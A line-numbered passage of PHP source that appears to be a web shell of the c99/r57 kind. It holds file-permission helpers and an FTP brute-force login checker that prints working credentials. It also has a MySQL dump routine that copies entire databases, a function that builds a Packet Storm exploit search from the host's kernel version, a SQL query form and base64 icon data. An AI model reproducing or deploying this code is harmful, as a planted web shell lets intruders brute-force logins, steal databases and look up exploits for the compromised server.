  2877. if ($bool) {$found[] = $d.$f; $found_f++;}
  2878. }
  2879. else {$found[] = $d.$f; $found_f++;}
  2880. }
  2881. }
  2882. }
  2883. }
  2884. closedir($h);
  2885. }
  2886. function tabsort($a,$b) { global $v; return strnatcmp($a[$v], $b[$v]);}
  2887. function view_perms_color($o) {
  2888. if (!is_readable($o)) { return "<font class=red>".view_perms(fileperms($o))."</font>"; }
  2889. elseif (!is_writable($o)) { return "<font color=white>".view_perms(fileperms($o))."</font>"; }
  2890. else { return "<font color=green>".view_perms(fileperms($o))."</font>"; }
  2891. }
  2892. function view_perms($mode) {
  2893. if (($mode & 0xC000) === 0xC000) {$type = "s";}
  2894. elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
  2895. elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
  2896. elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
  2897. elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
  2898. elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
  2899. elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
  2900. else {$type = "?";}
  2901. $owner["read"] = ($mode & 00400)?"r":"-";
  2902. $owner["write"] = ($mode & 00200)?"w":"-";
  2903. $owner["execute"] = ($mode & 00100)?"x":"-";
  2904. $group["read"] = ($mode & 00040)?"r":"-";
  2905. $group["write"] = ($mode & 00020)?"w":"-";
  2906. $group["execute"] = ($mode & 00010)?"x":"-";
  2907. $world["read"] = ($mode & 00004)?"r":"-";
  2908. $world["write"] = ($mode & 00002)? "w":"-";
  2909. $world["execute"] = ($mode & 00001)?"x":"-";
  2910. if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}
  2911. if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}
  2912. if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}
  2913. return $type.join("",$owner).join("",$group).join("",$world);
  2914. }
  2915. function parsesort($sort) {
  2916. $one = intval($sort);
  2917. $second = substr($sort,-1);
  2918. if ($second != "d") {$second = "a";}
  2919. return array($one,$second);
  2920. }
  2921. function parse_perms($mode) {
  2922. if (($mode & 0xC000) === 0xC000) $t = "s";
  2923. elseif (($mode & 0x4000) === 0x4000) $t = "d";
  2924. elseif (($mode & 0xA000) === 0xA000) $t = "l";
  2925. elseif (($mode & 0x8000) === 0x8000) $t = "-";
  2926. elseif (($mode & 0x6000) === 0x6000) $t = "b";
  2927. elseif (($mode & 0x2000) === 0x2000) $t = "c";
  2928. elseif (($mode & 0x1000) === 0x1000) $t = "p";
  2929. else $t = "?";
  2930.  
  2931. $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;
  2932. $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;
  2933. $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;
  2934. return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);
  2935. }
  2936. function str2mini($content,$len) {
  2937. if (strlen($content) > $len) {
  2938. $len = ceil($len/2) - 2;
  2939. return substr($content, 0,$len)."...".substr($content,-$len);
  2940. } else {
  2941. return $content;
  2942. }
  2943. }
  2944. function strips(&$arr, $k="") {
  2945. if (is_array($arr)) {
  2946. foreach($arr as $k=>$v) {
  2947. if (strtoupper($k) != "GLOBALS") strips($arr["$k"]);
  2948. }
  2949. }
  2950. else { $arr = stripslashes($arr); }
  2951. }
  2952. function getmicrotime() {
  2953. list($usec, $sec) = explode(" ", microtime());
  2954. return ((float)$usec + (float)$sec);
  2955. }
  2956. function packetstorm() {
  2957. $Lversion = php_uname("r");
  2958. $OSV = php_uname("s");
  2959. if(eregi("Linux",$OSV)) {
  2960. $Lversion = substr($Lversion,0,6);
  2961. return "http://packetstormsecurity.org/search/?q=Linux+Kernel ".$Lversion;
  2962. } else {
  2963. $Lversion = substr($Lversion,0,3);
  2964. return "http://packetstormsecurity.org/search/?q=".$OSV." ".$Lversion;
  2965. }
  2966. }
  2967. function fx29ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh) {
  2968. if ($fqb_onlywithsh) { $TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin"))); }
  2969. else { $TRUE = TRUE; }
  2970. if ($TRUE) {
  2971. $sock = @ftp_connect($host,$port,$timeout);
  2972. if (@ftp_login($sock,$login,$pass)) {
  2973. echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>";
  2974. @ob_flush();
  2975. return TRUE;
  2976. }
  2977. }
  2978. }
  2979. ##[ MySQL FUNCTIONS ]##
  2980. function mysql_dump($set) {
  2981. $sock = $set["sock"];
  2982. $db = $set["db"];
  2983. $print = $set["print"];
  2984. $nl2br = $set["nl2br"];
  2985. $file = $set["file"];
  2986. $add_drop = $set["add_drop"];
  2987. $tabs = $set["tabs"];
  2988. $onlytabs = $set["onlytabs"];
  2989. $ret = array();
  2990. $ret["err"] = array();
  2991. if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
  2992. if (empty($db)) {$db = "db";}
  2993. if (empty($print)) {$print = 0;}
  2994. if (empty($nl2br)) {$nl2br = 0;}
  2995. if (empty($add_drop)) {$add_drop = TRUE;}
  2996. if (empty($file)) {
  2997. $file = $tmp_dir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";
  2998. }
  2999. if (!is_array($tabs)) {$tabs = array();}
  3000. if (empty($add_drop)) {$add_drop = TRUE;}
  3001. if (sizeof($tabs) == 0) {
  3002. #Retrieve tables-list
  3003. $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
  3004. if (mysql_num_rows($res) > 0) {
  3005. while ($row = mysql_fetch_row($res)) {
  3006. $tabs[] = $row[0];
  3007. }
  3008. }
  3009. }
  3010. $out = "
  3011. # Dumped by ".sh_name()."
  3012. # MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."
  3013. # Date: ".date("d.m.Y H:i:s")."
  3014. # DB: \"".$db."\"
  3015. #---------------------------------------------------------";
  3016. $c = count($onlytabs);
  3017. foreach($tabs as $tab) {
  3018. if ((in_array($tab,$onlytabs)) or (!$c)) {
  3019. if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
  3020. #Receieve query for create table structure
  3021. $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
  3022. if (!$res) {$ret["err"][] = mysql_smarterror();}
  3023. else {
  3024. $row = mysql_fetch_row($res);
  3025. $out .= $row["1"].";\n\n";
  3026. #Receieve table variables
  3027. $res = mysql_query("SELECT * FROM `$tab`", $sock);
  3028. if (mysql_num_rows($res) > 0) {
  3029. while ($row = mysql_fetch_assoc($res)) {
  3030. $keys = implode("`, `", array_keys($row));
  3031. $values = array_values($row);
  3032. foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
  3033. $values = implode("', '", $values);
  3034. $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
  3035. $out .= $sql;
  3036. }
  3037. }
  3038. }
  3039. }
  3040. }
  3041. $out .= "#---------------------------------------------------------------------------------\n\n";
  3042. if ($file) {
  3043. $fp = fopen($file, "w");
  3044. if (!$fp) {$ret["err"][] = 2;}
  3045. else {
  3046. fwrite ($fp, $out);
  3047. fclose ($fp);
  3048. }
  3049. }
  3050. if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
  3051. return $out;
  3052. }
  3053. function mysql_buildwhere($array,$sep=" and",$functs=array()) {
  3054. if (!is_array($array)) {$array = array();}
  3055. $result = "";
  3056. foreach($array as $k=>$v) {
  3057. $value = "";
  3058. if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
  3059. $value .= "'".addslashes($v)."'";
  3060. if (!empty($functs[$k])) {$value .= ")";}
  3061. $result .= "`".$k."` = ".$value.$sep;
  3062. }
  3063. $result = substr($result,0,strlen($result)-strlen($sep));
  3064. return $result;
  3065. }
  3066. function mysql_fetch_all($query,$sock) {
  3067. if ($sock) {$result = mysql_query($query,$sock);}
  3068. else {$result = mysql_query($query);}
  3069. $array = array();
  3070. while ($row = mysql_fetch_array($result)) {$array[] = $row;}
  3071. mysql_free_result($result);
  3072. return $array;
  3073. }
  3074. function mysql_smarterror($sock) {
  3075. if ($sock) { $error = mysql_error($sock); }
  3076. else { $error = mysql_error(); }
  3077. $error = htmlspecialchars($error);
  3078. return $error;
  3079. }
  3080. function mysql_query_form() {
  3081. global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
  3082. if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
  3083. if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
  3084. if ((!$submit) or ($sql_act)) {
  3085. echo "<table><tr><td><form name=\"alecs_sqlquery\" method=\"post\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\"> <input type=submit value=\"No\"></form></td>";
  3086. if ($tbl_struct) {
  3087. echo "<td valign=\"top\"><b>Fields:</b><br>";
  3088. foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "+ <a href=\"#\" onclick=\"document.alecs_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
  3089. echo "</td></tr></table>";
  3090. }
  3091. }
  3092. if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
  3093. }
  3094. function mysql_create_db($db,$sock="") {
  3095. $sql = "CREATE DATABASE `".addslashes($db)."`;";
  3096. if ($sock) {return mysql_query($sql,$sock);}
  3097. else {return mysql_query($sql);}
  3098. }
  3099. function mysql_query_parse($query) {
  3100. $query = trim($query);
  3101. $arr = explode (" ",$query);
  3102. $types = array(
  3103. "SELECT"=>array(3,1),
  3104. "SHOW"=>array(2,1),
  3105. "DELETE"=>array(1),
  3106. "DROP"=>array(1)
  3107. );
  3108. $result = array();
  3109. $op = strtoupper($arr[0]);
  3110. if (is_array($types[$op])) {
  3111. $result["propertions"] = $types[$op];
  3112. $result["query"] = $query;
  3113. if ($types[$op] == 2) {
  3114. foreach($arr as $k=>$v) {
  3115. if (strtoupper($v) == "LIMIT") {
  3116. $result["limit"] = $arr[$k+1];
  3117. $result["limit"] = explode(",",$result["limit"]);
  3118. if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
  3119. unset($arr[$k],$arr[$k+1]);
  3120. }
  3121. }
  3122. }
  3123. }
  3124. else { return FALSE; }
  3125. }
  3126. ##[ END OF MYSQL FUNCTIONS ]##
  3127.  
  3128. ##[ IMAGES ]##
  3129. function imagez() {
  3130. $images = array(
  3131. "home"=>
  3132. 'R0lGODlhEwAYALMJAH6+91OZ97zp/l6x/Y/V/iVr7DGQ/QwxyAEKpP///wAAAAAAAAAAAAAAAAAA'.
  3133. 'AAAAACH5BAHoAwkALAAAAAATABgAAASoMEkJwrwYAyEqyFkQcFwFTuJAkF1xDkExAARdAy4W4EUw'.
  3134. 'zwAALEfhFQy+5AAWmwwLUIN0OhPlBjLocSpdDgzYBLYnjXa/U1fMQD6auWzxMQBmn0XpBJ6OB6fs'.
  3135. 'cXwiPl5LBwgIdGqDhV4FiImBKV5CQQGQPjlgS0GVMJBfRD5BBDU1l4g+BxcGNqYEAQeHBasYBqW4'.
  3136. 'sLK1IAUcK7onFwWlOMIZB0THyxgRADs=',
  3137. "buffer"=>
  3138. 'R0lGODlhGAAWALMJABo+qGql77zK4OPw+pXE9Tx33mOCxx5WzYyv4v///wAAAAAAAAAAAAAAAAAA'.
  3139. 'AAAAACH5BAHoAwkALAAAAAAYABYAAASbMMlJa0LFao0QMZslDMJFEEGhhtPgul4gFwebvK9BICnN'.
  3140. '4oPOACU7HAAb3Gl4mtGQltfSdSI+AdAWVVlNGbHZmxTYVB3BUOCI2vR+AQaQZL1lz74GhEAgn48I'.
  3141. 'bCg0BwV7ewh9AgSGgEM9ASOGe32NiwFMAY0ukgZhU1WaOHxhE0tTQCR9GksIqHyqG4qnQbAsAkK0'.
  3142. 'NhsFiLq+NhEAOw==',
  3143. "search"=>
  3144. 'R0lGODlhGAAXAKIEAHl5ecbGxqCgoOvr6////wAAAAAAAAAAACH5BAHoAwQALAAAAAAYABcAAANq'.
  3145. 'SLq88iK02UIM1kY67fgDhj3c4oGiKJRK9mUpycFpHQClHbw8zl2iEOjlo9SEw1DRuNsliaygMwlY'.
  3146. 'di7PgcDKUD2moW1utAVAHtUS9maGmLkOTBiudrJZk3Uaz4gQ6XUYe3wNb4CEiImKCQA7',
  3147. "back"=>
  3148. 'R0lGODlhGAAYALMJAC9ILkesPbHdo3W0Zi2IJ+f141aOUTRoM4LKdP///wAAAAAAAAAAAAAAAAAA'.
  3149. 'AAAAACH5BAHoAwkALAAAAAAYABgAAASwMMlJq7046zSM/8YmeYNgFiZiHMdmCEVszoIaXscLpwhC'.
  3150. 'dy2LASETlAoBXw8xCFYMqNQuWesBK4OjkVgYLL8B52h2LCCS2WxgECAAJiteLNarMtduOEE678/P'.
  3151. 'bW8jBzVefigybIEUQz0BMF0EAZOTkm6CEgCNbFOUngR5FAdLazCAlKChomt3ASiolpiMB5OKbJZt'.
  3152. 'oLIVtJ6VuaoXAAepxbq7GcTFAMgbzM/NItLTGxEAOw==',
  3153. "forward"=>
  3154. 'R0lGODlhGAAYAKIGAB9fHVu2T7nirIbKdjaXL+z36P///wAAACH5BAHoAwYALAAAAAAYABgAAAOc'.
  3155. 'aLrc/g1ICSsZIosRSGWXUGjaQAAfIY7Z4GIc+qgFy734+Qxsy2+BV8dBGPVeI04wEJAtfiSgSMCs'.
  3156. 'Og2AEu5Wo1Z1iuwGsymvChxCxynG1N7wWocAxmaCGVZcQKezYVVfPCNzJ1cBYzdMF4R9dWEwQkFy'.
  3157. 'hY8KF5KIaI6WYUGKS5ydYReBapxXDgBqpn0UH2Grjq+wDBMTtbm6uwsJADs=',
  3158. "up"=>
  3159. 'R0lGODlhGAAXAKIGABxXG0irPrLeo3zFbzWFMOLz3v///wAAACH5BAHoAwYALAAAAAAYABcAAAOP'.
  3160. 'aLrc/jBKMoa4lRCp6C1XOASbNBQgVq1D6XipsAYs+RCoAFZ5QNMEQIOSq+hQO59PyAjoMEckauQL'.
  3161. 'MnBQaS5JYnZ2Tx6INu5ed5bRqUClmhcEEU3srlrhIZlsXSe8OxZ6K1NKJAFecIEshFV/CwBONRiN'.
  3162. 'dy9zFYVKGohDlz92AJw3mSRBohGhqaEcrK2uDgkAOw==',
  3163. "help"=>
  3164. 'R0lGODlhGAAYAKIGADlqzKjA6O3x932d3rPk/12Byv///wAAACH5BAHoAwYALAAAAAAYABgAAAOa'.
  3165. 'aLor7ixK8+qb0eqLN/mENVlfYJpDUEkPMaSh474xwbTvsA3AEN8CV6GgEhR6Dh5SEFA8BkeASgmQ'.
  3166. 'Aa4/igMQvXoLjoBXJ3AGu95rMQ0ua8Vpb5HKhWgJ8SsZfbVb8ypwaWRmRoACdHp2Wol5aTINW3Ep'.
  3167. 'fHtAgn1MbByRmnKIXw8FLE9fV0ScEkVhKSYrGAqrG02wEa6stbm6CQA7',
  3168.  
  3169. "change"=>
  3170. 'R0lGODlhEAAQALMMADMuME2f58e2ON7OMsXZ88wpTd/t/FhYU4x9erCwrIWSpW54iwAAAAAAAAAA'.
  3171. 'AAAAACH5BAHoAwwALAAAAAAQABAAAARckMlJ6wQn6wMsW0QoBktXLUaaEkHAIYiJqiuhFAUg0yqR'.
  3172. 'IAKdZMYzIAacCbGXEAyEQ0IvlEAeKCCDVJpompRbkUJzEokBi0XZTFgoCFfKwa1Q0NNxCmazz3v+'.
  3173. 'DBEAOw==',
  3174. "delete"=>
  3175. 'R0lGODlhEAAQAKIGAJIMJNMHLckjQURDQ2oqNigoKAAAAAAAACH5BAHoAwYALAAAAAAQABAAAANP'.
  3176. 'KDHW/k4JBiuRFI5pilBE8RQX12yBIHYfMGTeNxQoMVfbJ7gZ5AWpV8VBU6SGkVSpR7zwdISKURgz'.
  3177. 'dS4B2yMXMgyAWo2OBGQ6cq+NmbhJAAA7',
  3178. "download"=>
  3179. "R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA".
  3180. "AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu".
  3181. "EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=",
  3182. "setup"=>
  3183. "R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC".
  3184. "QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
  3185. "ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB".
  3186. "qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE".
  3187. "OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==",
  3188. "small_dir"=>
  3189. 'R0lGODlhDwAQALMPAAkJCXV3iEFvz5it4MXV8lFkqXaU2au+6EtMViQkJYGGq2JjcUFhunN3ljc3'.
  3190. 'OQAAACH5BAHoAw8ALAAAAAAPABAAAARuEKDVVEsv64wO+UfjOBO1AM2nHsbQGkaDDCo43EdOVPW9'.
  3191. 'ErmFgjDI6YyHm7AINN5cMESgSH3CBAKGo9GCwgxYrHbx/YbDYwEYfEY7Fu149s2QZxkFRQJRR+Mb'.
  3192. 'AQsOAA98DH8NggCEGgmAiowbGREAOw==',
  3193. "small_unk"=>
  3194. 'R0lGODlhEAAQAKIHABpFnoap3bTL89vq/FuCvVZlhH6Ms////yH5BAHoAwcALAAAAAAQABAAAANL'.
  3195. 'eBfcrVCFQetgJS5bA/nRxFlGJlUFoBICZUDi6gGsYG5DWqntLZI8G4xDCApPHeMR5wL8lgbSE9rq'.
  3196. 'OavUqurngTm+ntuhQC6byYcEADs=',
  3197. "multipage"=>"R0lGODlhCgAMAJEDAP/////3mQAAAAAAACH5BAEAAAMALAAAAAAKAAwAAAIj3IR".
  3198. "pJhCODnovidAovBdMzzkixlXdlI2oZpJWEsSywLzRUAAAOw==",
  3199. "sort_asc"=>
  3200. "R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa".
  3201. "SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==",
  3202. "sort_desc"=>
  3203. "R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb".
  3204. "SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=",
  3205. "ext_asp"=>
  3206. "R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/".
  3207. "/////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgI".
  3208. "D6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=",
  3209. "ext_mp3"=>
  3210. 'R0lGODlhEAARALMPADE8XE6ekMSuNMDW7M1IRGRoZOXs9Ki31Y2HW3PEiFl2u19RX4ajzNmCeuew'.
  3211. 'pwAAACH5BAHoAw8ALAAAAAAQABEAAASI8D1Gqy0yM8O7GRSmeR2oKOJEcgN4oJJyNExSD197iAjS'.
  3212. 'OI2EkIFrYQqN3+cgRBA/iwLhh+MwE4HDYLeYGg4MLTNQCBi7joECcKKQC9tCV7tmhwoALV5BPMnA'.
  3213. 'PXk7BSc5LA4CCAUHXCcHHogChIwYbG2RkgVhOxKWCggCkgCafCkAp6inBaurEQA7',
  3214. "ext_avi"=>
  3215. 'R0lGODlhEAAQALMMAAUFBY2OkM7T2UpKSqWoq+zz/GhoaSQkJLW4u1paWnp6ejY3NwAAAAAAAAAA'.
  3216. 'AAAAACH5BAHoAwwALAAAAAAQABAAAARdkMkpgVGH6poIwttkeQUBbqNQrGZGjYG6lobLWAoixHOw'.
  3217. 'GByDbpUrAQ6K2+AoW/0OyOMy4GtioozBgsAaqBDa08AwoxHCgMmPRzSM05R17x2SBxKn+uUCD0nW'.
  3218. 'fRoRADs=',
  3219. "ext_cgi"=>
  3220. 'R0lGODlhEAAQAKIHAEhJS+q8D/7dNfnulpR/U5pqCtS5eP///yH5BAHoAwcALAAAAAAQABAAAANT'.
  3221. 'eLpX/K9ISItwlElBcG5BMEFSGYolVgzsYAih0Q5FF7IwjAcdcRCE021wKQB8CqCQRQAcH4SXYOck'.
  3222. 'EQUy2DMSMmaBEWITSBAjFZLxAliDghlkRQIAOw==',
  3223. "ext_cmd"=>
  3224. "R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI".
  3225. "eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN".
  3226. "dmrYAMn1onq/YKpjvEgAADs=",
  3227. "ext_cpp"=>
  3228. "R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANC".
  3229. "WLPc9XCASScZ8MlKicobBwRkEIkVYWqT4FICoJ5v7c6s3cqrArwinE/349FiNoFw44rtlqhOL4Ra".
  3230. "Eq7YrLDE7a4SADs=",
  3231. "ext_ini"=>
  3232. "R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL".
  3233. "aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM".
  3234. "SnEjgPVarHEHgrB43JvszsQEADs=",
  3235. "ext_diz"=>
  3236. 'R0lGODlhEAAQAKIHAAsZcWyPv7vT6eb0/ThOi1tukZyyy////yH5BAHoAwcALAAAAAAQABAAAANS'.
  3237. 'eHrTLiu6IYh5chZAJlRTI4RDcIyacXkF6gAcWaxPLFJzaNhoZYyoXQcoCMwErgCHuFP8kEVjAGkg'.
  3238. 'FBaqJ9CgvEYOBQK06/0qjlazuSBVr8uLBAA7',
  3239. "ext_doc"=>
  3240. "R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///8DAwAAA/4CAgAAAAAAAAAAAAANR".
  3241. "WErcrrCQQCslQA2wOwdXkIFWNVBA+nme4AZCuolnRwkwF9QgEOPAFG21A+Z4sQHO94r1eJRTJVmq".
  3242. "MIOrrPSWWZRcza6kaolBCOB0WoxRud0JADs=",
  3243. "ext_exe"=>
  3244. "R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7".
  3245. "WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt".
  3246. "xhIAOw==",
  3247. "ext_h"=>
  3248. "R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANB".
  3249. "WLPc9XCASScZ8MlKCcARRwVkEAKCIBKmNqVrq7wpbMmbbbOnrgI8F+q3w9GOQOMQGZyJOspnMkKo".
  3250. "Wq/NknbbSgAAOw==",
  3251. "ext_hpp"=>
  3252. "R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANF".
  3253. "WLPc9XCASScZ8MlKicobBwRkEAGCIAKEqaFqpbZnmk42/d43yroKmLADlPBis6LwKNAFj7jfaWVR".
  3254. "UqUagnbLdZa+YFcCADs=",
  3255. "ext_htaccess"=>
  3256. "R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6".
  3257. "WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ".
  3258. "AAA7",
  3259. "ext_html"=>
  3260. 'R0lGODlhEAAQALMOAIyt016Itv///2Gp4uXy/c3P/MXl/mtrnC6Z4mfd/Chgk7PO9lBVhnNzc///'.
  3261. '/wAAACH5BAHoAw4ALAAAAAAQABAAAASF0EkHqq1h6nuzloAgjkIwfJRIFJVxFMgHDGYQCMihe46d'.
  3262. '/IiBIEEQFA4SkwHBZAaKK2RPAFAACM0nwTUFMAeD5mFBWCCpTIV6rSCbKQkFQpEw2A1lw4LRa84X'.
  3263. 'cn96fAg4gQgJAwwAensOAyFzCgyTAAsFgxKQAywVBZcGn3wTDKWlDaamEQA7',
  3264. "ext_jpg"=>
  3265. 'R0lGODlhDgAQALMMACYlIC6NFLOxKnqIcbPIikWoIkVFRWllROLZUmO8NqKmoBBxCAAAAAAAAAAA'.
  3266. 'AAAAACH5BAHoAwwALAAAAAAOABAAAARbMKxJ6zw2iGQHFSACCpQ3CWJISmaBCsABcouJiECOIkVg'.
  3267. '7gadiBXoAXc9X/LGRBASvUEPmiA4qUXpFPpMZrHQojchJZjDVOpgoGib3+82W8Gu0+nrGD2Y4wcN'.
  3268. 'EQA7',
  3269. "ext_js"=>
  3270. 'R0lGODlhDwAQAKIEAB4eHZ6eaOLih2BgWQAAAAAAAAAAAAAAACH5BAHoAwQALAAAAAAPABAAAANP'.
  3271. 'SAoR8nAARcZ4rQkr68VCI1nTB4Vj0H1iALzwpIUY3FXOKb4UwYSqDODmY+ROREtmkEFNhqKRyfV7'.
  3272. 'SFzHEQR62qSAnBxJoVSlxhRJLEZJAAA7',
  3273. "ext_lnk"=>
  3274. 'R0lGODlhEAAQAKIHAAAFACOPE2TNNj60IQRKAojuVgdlBAAAACH5BAHoAwcALAAAAAAQABAAAANO'.
  3275. 'eGfcbkCpQOu4AkZlLM5AKHlCqW3TVw4hmqqlKB3UKhQF6AZ2ibM7Ew+Xk6UIoQAROAsgQ4RbIWBc'.
  3276. 'tBbSq0RruD1dB1S3BZ5ZteYZ2ZwAADs=',
  3277. "ext_log"=>
  3278. "R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA".
  3279. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN".
  3280. "zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==",
  3281. "ext_php"=>
  3282. 'R0lGODlhEAAQAIABAP///////yH5BAHoAwEALAAAAAAQABAAAAIohI8Jwe0Po5wNsRWWxbl3blSe'.
  3283. 'VmHmMWZouj2md7kxB8cfhec6pPRHAQA7',
  3284. "ext_pl"=>
  3285. "R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo".
  3286. "GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7",
  3287. "ext_swf"=>
  3288. "R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O".
  3289. "nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
  3290. "ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA".
  3291. "GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC".
  3292. "NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=",
  3293. "ext_tar"=>
  3294. 'R0lGODlhEAAQAKIFABokHymwoKiYkKIYbdzo4wAAAAAAAAAAACH5BAHoAwUALAAAAAAQABAAAAM4'.
  3295. 'CLrcJVCMSesAJJOhY7waAUgWhWljo67rE7FMGGhzYNtnNt48HsJAlgsSzIlovYAxlfShBMVoIQEA'.
  3296. 'Ow==',
  3297. "ext_txt"=>
  3298. 'R0lGODlhCwAQAKIFACoqKqCeoO/z83d2brO2vwAAAAAAAAAAACH5BAHoAwUALAAAAAALABAAAAM5'.
